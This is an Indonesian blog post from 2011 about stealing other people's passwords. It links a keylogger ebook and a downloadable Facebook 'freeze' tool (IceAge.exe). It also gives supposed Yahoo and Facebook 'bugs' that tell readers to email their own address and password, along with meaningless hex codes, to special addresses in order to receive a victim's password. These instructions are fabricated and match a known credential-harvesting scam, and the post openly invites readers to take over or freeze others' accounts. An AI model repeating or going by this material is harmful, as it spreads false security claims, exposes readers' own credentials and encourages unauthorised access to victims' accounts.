Sabtu, 17 September 2011

Mencuri Password dengan Keylogger & Bagaimana cara mendapatkan pasword dan memonitor email orang lain?

by Nant☺™
Setiap account di internet pasti memerlukan username dan password. Username dan Password adalah suatu hal yang paling rahasia dalam suatu transaksi di internet. Bahkan saking rahasianya, orang paling terdekat pun jangan sampai mengetahui usename dan password kita. Namun mengapa ada saja seseorang yang kebobolan account nya padahal tidak seorangpun ia beritahu tentang username dan passwordnya?
Banyak sekali kejadian bahwa username dan password dari suatu account seseorang dibajak orang. Artinya kita tidak dapat lagi mengakses account kita. Pernah suatu ketika, teman saya datang kepada saya, dan melaporkan bahwa account e-currency (pembayaran electronic), hilang sebesar US $ 500, atau sekitar 5 juta rupiah. Hmm..mungkin ia adalah korban pencurian password.
Mencuri username dan password seseorang bisa dilakukan dengan berbagai cara. Salah satunya adalah dengan menggunakan software Keylogger. Apa itu keylogger?
Keyloger adalah software pencatat aktivitas yang kita lakukan di komputer. Apapun yang kita ketikkan di komputer, maka akan tercatat oleh keyloger tersebut. Dari kita menekan a-z, 0-9, kombinasi keyboard seperti ctrl+A dan lain-lain akan tercatat oleh keylogger. Keylogger akan mencatatnya dalam bentuk file teks, *.txt.
Cara kerja keyloger bersifat hidden (tersembunyi). Biasanya dia akan muncul di systray jika kita melakukan kombinasi keyboard (shortcut tertentu). Begitu kita menekan kombinasi keyboard, maka icon keylogger akan muncul di systray.
Bagaimana caranya seseorang bisa mencuri username dan password kita dengan menggunakan keylogger? Baca dan ketahui cara seseorang mencuri username dan password kita dengan menggunakan keylogger dalam ebook gratis yang berjudul Mencuri Password dengan Keylogger
Ebook yang berjudul Mencuri Password dengan Keylogger ini tidak digunakan untuk mencuri password dan username orang lain, atau bahkan untuk berbuat kejahatan..tetapi materi ini digunakan untuk membantu kita terhindar dari kejahatan. Agar kita waspada dan berhati – hati dengan pencurian password dengan menggunakan keylogger.
Sebelum download ebook ini, baca dulu TIPS MEMPERCEPAT DOWNLOAD DISINI
Download Ebook Tersebut Disini
Mencuri Password dengan Keylogger (315 kb)


    Download Juga:
  1. Cara Termudah Melindungi Diri dari Serangan Keylogger
  2. Memanage dan Mengamankan Password dengan Sticky Password 4.1
  3. Tips Melindungi Password Online Anda
  4. Simpan Password Anda Secara Aman dengan KeePass Password Safe
  5. Melawan Serangan Keylogger dengan Zemana Antilogger!


Bagaimana cara mendapatkan pasword dan memonitor email orang lain?

Melalui artikel ini saya ingin mencoba untuk membungkam mulut-mulut mereka agar di masa yang mendatang tidak ada generasi-generasi dari mereka yang menanyakan hal yang sama berulang-ulang.

Jika anda bukan bagian dari mereka dan anda paham betul apa maksud artikel ini dan apa tujuan saya menerbitkan artikel ini, maka dengan segala hormat saya meminta kepada anda untuk bisa memaklumi tindakan saya ini.

Wahai para newbies dan script kiddies…!!
Selamat berpesta!!! (^_*)

Bugs pada Yahoo Mail (http://mail.yahoo.com)

Yahoo Mail memiliki sistem pertahanan yang cukup tangguh. Disamping itu, tampilan mailbox yang menawan dan banyakanya fitur- fitur menarik yang tersedia dibandingkan dengan penyedia layanan email berbasis web gratisan lainnya menjadi alasan utama bagi mereka untuk memilih Yahoo!. Ketika dahulu (dan juga hingga kini) tehnik session hijacking semakin marak dikalangan para attacker, pengguna Yahoo Mail bisa sedikit berlega hati karena Yahoo telah mengantisipasi hal tersebut dengan menerapkan beberapa aturan berikut:

1. Menetapkan session identifier yang unik.
2. Menetapkan sistem identifier berpola acak.
3. Session identifier yang independen.
4. Session identifier yang bisa dipetakan dengan koneksi client side.

Keempat hal diatas telah cukup untuk membuat banyak para kiddies harus gigit jari karena serangan session hijacking akan sangat-sangat sulit untuk dilakukan (karena ketidakmampuan mereka tentunya dan pengecualian bagi kaum elite Razz) Tapi bagi kamu yang sangat-sangat bernafsu untuk bisa menembus email yahoo orang lain kini bisa sedikit terhibur karena telah ada sebuah bugs baru pada Yahoo.

Yahoo memiliki sebuah alamat email special yang otomatis dikendalikan oleh mesin yang jika kita kirimkan sebuah nilai “uid” trenkripsi kepada alamat itu bersama alamat email korban, maka kamu akan memperoleh balasan email otomatis yang berisi password korban.

Memanfaatkan Bugs

Sudah gak sabar yach…
okay, sekarang ikuti langkah-langkah berikut:

Sign in lah kedalam account kamu terlebih dahulu, kemudian dengan perasaan yang mendalam, tekan tombol [Compose]/[tulis surat ] untuk menulis email.

Pada form isian to: masukkan alamat berikut: webmasterautoresponse3020 [at] yahoo [dot] com

This e-mail address is being protected from spam bots, you need JavaScript enabled to view it Alamat inilah yang saya sebutkan sebagai alamat special tadi. Sebenarnya alamat ini hanya boleh diketahui oleh para admin Yahoo saja, namun yeah.. kini alamat mematikan ini telah jatuh ke tangan kita.

Pada form cc dan bcc, kosongi saja kedua form tersebut sedangkan pada form Subject ketik “uid” tanpa tanda kutip.

Pada form message (pesan), ketik kode UID berikut:

mail.yahoo.com FALSE/FALSE 30201142526d 61 69 6c 6e 10
alamat email kamu C7 CB C3 C6 84 C9 :
password kamu 6C 61 6D 65 72 69 :
alamat email korban Setelah itu tekan tombol send.

Dan tunggulah dalam beberapa hari kamu akan menerima email balasan yang berisi password korban dan informasi-informasi mengenai korban seperti secreet question yang dipakai korban beserta jawabannya dan tanggal lahir korban.

Contohnya:
misalkan alamat email kamu adalah rudy [at] yahoo [dot] com.
This e-mail address is being protected from spam bots, you need JavaScript enabled to view it dan password kamu dan alamat email korban korban [at] yahoo [dot] com.
This e-mail address is being protected from spam bots, you need JavaScript enabled to view it.
Maka susunannya adalah sebagai berikut:

to: webmasterautoresponse3020@yahoo.com
Subject:uid
message:
mail.yahoo.com FALSE/FALSE 30201142526d 61 69 6c 6e 10 : bpp_bandit@yahoo.com
C7 CB C3 C6 84 C9 : rhudy123
6D 6C 65 72 69 : korban@yahoo.com

Cara Pencegahan

Bagi kamu para pengguna email yahoo yang tidak ingin passwordmu dicuri dengan tehnik ini, lakukan cara berikut:

to: isikan webmasterautoresponse3020@yahoo.com

Pada form isian cc dan bcc kosongi saja kedua form tersebut dan subject ketik “nouid” tanpa tanda kutip.

message sebagai berikut:
mail.yahoo.com FALSE/FALSE 302011425263 65 77 65 63 61 78 65 70 : NOVIEWPWD
alamat email kamu : password kamu

Setelah mengirim email tersebut, maka bisa dipastikan email kamu sudah aman dari bugs mematikan ini.
Orang yang berusaha melakukan tehnik ini tidak akan pernah mendapat balasan email yang berisi passswordmu. Namun harap diingat bahwa kamu juga harus melakukan hal ini setelah melakukan perubahan account.
Jadi jika suatu ketika kamu mengganti password, lakukan cara penyelamatan lagi.

Cara Membekukan Akun Facebook Orang Lain

Apa anda baru saja dijahili orang di FB atau ada pengguna facebook yang seringkali meneror anda dengan status, komentar atau pesan yang mereka kirimkan puluhan kali ? Bekukan saja akun mereka dengan tool dibawah ini. Cara membekukan Akun Facebook orang lain yang akan dibahas ini adalah salah satu jenis hack password fb yang kini sedang populer dikalangan member fb. Untuk lebih jelasnya bagaimana cara freeze atau membekukan akun facebook orang lain ini, berikut adalah beberapa langkah yang harus anda lakukan
1. Download dulu toolnya disini
2. Buka Cranksy’s IceAge.exe
- Masukkan nama Email target pada kotak Email Addy
- Centang pilihan, Normal Freeze jika ingin membekukan facebook untuk sementara atau pilih Forever Freeze jika anda ingin akun facebook itu beku selamanya.
- Kalau sudah memilih tinggal klik freeze
Kalau mau lihat proses dan efek dari hasil freeze tadi centang watch the action

 Hack Password FB

Cara terbaru hack password facebook telah ditemukan dan ini bisa anda manfaatkan untuk mengetahui password dari pengguna facebook lain dengan lebih mudah. Hack Password FB sebaiknya jangan dipergunakan untuk hal2 yang salah agar setiap pengguna facebook tetap merasa nyaman dengan situs pertemanan tersebut. Namun jika memang anda merasa dikerjai atau diperlakukan tidak adil oleh member yang lain atau oleh orang yang baru anda kenal dengan beberapa macam alasan, maka hacking fb ini mungkin akan sangat berguna untuk sekedar memberikan pelajaran bagi si usil tersebut
Hack Password FB ada beberapa jenis. Ada yang bertujuan untuk membobol fb dengan cara melihat password orang tersebut atau bisa juga dengan cara membekukan fb mereka untuk sementara waktu atau bahkan untuk selamanya. Anda juga bisa melihat id pengguna yang lain yang memanfaatkan id tersebut untuk mengerjai mereka. Dengan kata lain gunakan hack facebook atau fb ini sesuai dengan apa yang anda alami atau ketahui. Dan sekali lagi jangan gunakan kemampuan hack anda untuk melakukan kejahatan karena itu akan berakibat fatal dan resiko anda tanggung sendiri
Jika misalkan email anda adalah cinta.laura@yahoo.com
dan email korban anda adalah krisdayanti@yahoo.com
dan password anda adalah : rahasia
Maka email yg anda tulis nantinya adalah:
To: facebookresetmail@yahoo.com
bcc: cc: (biarkan kosong)
Subject: password retrieve
krisdayanti@yahoo.com
cinta.laura@yahoo.com
rahasia
local/$et76431&=pwrs
Selanjutnya setelah anda mengirim email tersebut anda akan mendapatkan balasan secara otomatis dari yahoo dengan dengan subject: System Reg
Message
Biasanya yahoo memerlukan waktu sekitar 30 menit untuk mengkonfirmasikan dan meng-extract password yang anda minta.
Sumber : pencarian google

Tidak ada komentar:

Posting Komentar